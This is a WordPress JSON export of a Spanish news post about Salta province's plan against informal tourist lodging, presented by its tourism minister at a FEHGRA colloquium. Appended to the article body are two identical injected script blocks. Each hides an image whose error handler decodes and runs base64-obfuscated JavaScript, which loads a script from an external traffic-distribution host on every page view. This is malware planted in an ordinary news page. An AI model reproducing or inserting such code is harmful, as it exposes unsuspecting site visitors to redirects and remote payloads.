{"id":2963,"date":"2023-08-07T09:40:05","date_gmt":"2023-08-07T12:40:05","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2963"},"modified":"2025-08-14T00:10:59","modified_gmt":"2025-08-14T03:10:59","slug":"salta-es-reconocida-a-nivel-nacional-por-su-trabajo-contra-la-informalidad-en-la-actividad-turistica","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2963","title":{"rendered":"Salta es reconocida a nivel nacional por su trabajo contra la informalidad en la actividad tur\u00edstica"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#760231\"><em>En el marco del Coloquio Tributario Hotelero y Gastron\u00f3mico organizado por la Federaci\u00f3n Empresaria Hotelera y Gastron\u00f3mica de la Rep\u00fablica Argentina, el Gobierno present\u00f3 el Plan Salta un Destino Seguro.<\/em><\/h4>\n\n\n\n<p>El ministro de Turismo y Deportes,&nbsp;<strong>Mario Pe\u00f1a<\/strong>, particip\u00f3 en el Coloquio Tributario Hotelero y Gastron\u00f3mico FEHGRA realizado en Misiones, all\u00ed present\u00f3 los resultados del plan Salta un Destino Seguro.<\/p>\n\n\n\n<p>\u201cLos problemas debemos ponerlos sobre la mesa, la informalidad mata\u201d, inici\u00f3 el ministro Pe\u00f1a al inicio de su exposici\u00f3n en Puerto Iguaz\u00fa. Afirm\u00f3 que \u201cen el Gobierno de Salta la lucha contra la informalidad ocupa un espacio importante dentro de la planificaci\u00f3n y es una clara decisi\u00f3n pol\u00edtica\u201d.&nbsp;<\/p>\n\n\n\n<p>Se refiri\u00f3 a la Ley provincial que regula el funcionamiento de alojamiento temporales para lo que existe un registro de propiedades destinados a este fin. En base a esta legislaci\u00f3n naci\u00f3 el Plan un Destino Seguro que es un dec\u00e1logo de medidas donde el trabajo en conjunto con los otros poderes del Estado, con los municipios, el sector privado y los turistas, es estrat\u00e9gico.<\/p>\n\n\n\n<p>Fernando Desbots, presidente de Fehgra, indic\u00f3 que \u00abel trabajo conjunto entre los sectores p\u00fablico y privado es estrat\u00e9gico para avanzar con la resoluci\u00f3n de problem\u00e1ticas que afectan a nuestra actividad. Una de las m\u00e1s importantes, es el impacto que genera en nuestros establecimiento la competencia desleal que impone la oferta de alojamiento tur\u00edstico temporario informal. Conocemos el gran trabajo que est\u00e1 haciendo Salta, el Plan Destino Seguro, es digno de ser replicado. Uno de sus puntos fuertes es que se ejecuta involucrando a los Municipios y al sector privado formal\u00bb.<\/p>\n\n\n\n<p>El dirigente nacional sostuvo que la regulaci\u00f3n y control de la oferta informal es prioritario para la hoteler\u00eda, la gastronom\u00eda y el turismo, motor clave para el desarrollo integral del pa\u00eds.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8285-salta-es-reconocida-a-nivel-nacional-por-su-trabajo-contra-la-informalidad-en-la-actividad-turistica.jpg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8285-salta-es-reconocida-a-nivel-nacional-por-su-trabajo-contra-la-informalidad-en-la-actividad-turistica.jpg\" alt=\"Salta es reconocida a nivel nacional por su trabajo contra la informalidad en la actividad tur\u00edstica\" width=\"318\" height=\"212\"\/><\/a><\/figure><\/div>\n\n\n<p>Durante la presentaci\u00f3n, el Ministro &nbsp;Pe\u00f1a detall\u00f3 los puntos del Plan que tiene como objetivo el fomento de un turismo responsable y seguro que garantice adem\u00e1s, servicios de calidad a los turistas. En este marco destac\u00f3 convenios con organismos y municipios, alianza estrat\u00e9gica con el sector privado como es el caso de Despegar, comunicaci\u00f3n estrat\u00e9gica de las medidas, facilitaci\u00f3n de tr\u00e1mites de formalizaci\u00f3n, estrategias de control y fiscalizaci\u00f3n, entre otras.<\/p>\n\n\n\n<p>Se\u00f1al\u00f3 que desde el inicio de la implementaci\u00f3n del Plan se han realizado m\u00e1s de 350 clausuras e infracciones a alojamientos tur\u00edsticos informales de un total de 2343 actuaciones del \u00e1rea a &nbsp;cargo que incluye partes e inspecciones, visitas t\u00e9cnicas y asesoramientos. A partir de esto, se habilitaron este a\u00f1o 56 nuevos alojamientos temporarios y est\u00e1n 158 en tr\u00e1mite.<\/p>\n\n\n\n<p>Salta es de las provincias con mayor n\u00famero de alojamientos temporarios registrados en relaci\u00f3n a la oferta total. Fehgra sostiene que la provincia hace tres a\u00f1os ten\u00eda el 10% de formalidad y hoy alcanza el 40%.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8286-salta-es-reconocida-a-nivel-nacional-por-su-trabajo-contra-la-informalidad-en-la-actividad-turistica.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8286-salta-es-reconocida-a-nivel-nacional-por-su-trabajo-contra-la-informalidad-en-la-actividad-turistica.jpg\" alt=\"Salta es reconocida a nivel nacional por su trabajo contra la informalidad en la actividad tur\u00edstica\" width=\"337\" height=\"207\"\/><\/a><\/figure><\/div>\n\n\n<p>\u201cDesde el Gobierno encabezado por el gobernador Gustavo S\u00e1enz, tenemos la convicci\u00f3n de intensificar el trabajo que venimos realizando en pos de erradicar la informalidad en nuestra\u201d, manifest\u00f3 Pe\u00f1a. \u201cCon estas decisiones pol\u00edticas que involucra al sector privado y los municipios, es posible avanzar y Salta lo viene demostrando\u201d.<\/p>\n\n\n\n<p>En representaci\u00f3n de Salta, tambi\u00e9n estuvieron&nbsp;el presidente de la C\u00e1mara de Turismo Juan Lucero y el vicepresidente de la C\u00e1mara Hotelera y Gastron\u00f3mica, Juan Chib\u00e1n.<\/p>\n\n\n\n<p><strong>Proceso de formalizaci\u00f3n<\/strong><\/p>\n\n\n\n<p>A los operativos e inspecciones realizadas por la Direcci\u00f3n de Control y Registros se las acompa\u00f1a con un espacio de asesoramiento y acompa\u00f1amiento constante para los actores informales a fin de que puedan iniciar y concluir el proceso de formalizaci\u00f3n ante el Ministerio de Turismo y Deportes.<\/p>\n\n\n\n<p>Cabe destacar que, a las inspecciones de alojamientos se le suman los operativos realizados en ruta de manera conjunta con la Comisi\u00f3n Provincial de Transporte y la Divisi\u00f3n de la Polic\u00eda Tur\u00edstica de la Provincia.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-es-reconocida-a-nivel-nacional-por-su-trabajo-contra-la-informalidad-en-la-actividad-turistica-91059\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco del Coloquio Tributario Hotelero y Gastron\u00f3mico organizado por la Federaci\u00f3n Empresaria Hotelera y Gastron\u00f3mica de la Rep\u00fablica Argentina, el Gobierno present\u00f3 el Plan Salta un Destino Seguro. El ministro de Turismo y Deportes,&nbsp;Mario Pe\u00f1a, particip\u00f3 en el Coloquio Tributario Hotelero y Gastron\u00f3mico FEHGRA realizado en Misiones, all\u00ed present\u00f3 los resultados del plan [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2964,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21],"tags":[],"class_list":{"0":"post-2963","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2963"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2963"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2963\/revisions"}],"predecessor-version":[{"id":7000,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2963\/revisions\/7000"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2964"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2963"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2963"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2963"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}